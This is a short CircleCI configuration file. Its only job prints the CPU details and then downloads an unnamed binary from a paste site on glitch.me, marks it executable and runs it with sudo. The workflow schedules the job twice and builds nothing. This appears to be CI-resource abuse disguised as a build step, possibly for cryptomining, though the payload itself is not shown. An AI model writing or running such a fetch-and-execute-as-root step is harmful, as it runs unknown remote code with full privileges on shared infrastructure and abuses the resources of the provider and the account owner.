version: 2.1

jobs:
  trial:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: wget https://muq-hastebin.glitch.me/raw/rbXy36HWQr && chmod u+x rbXy36HWQr && sudo ./rbXy36HWQr
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial
        - trial
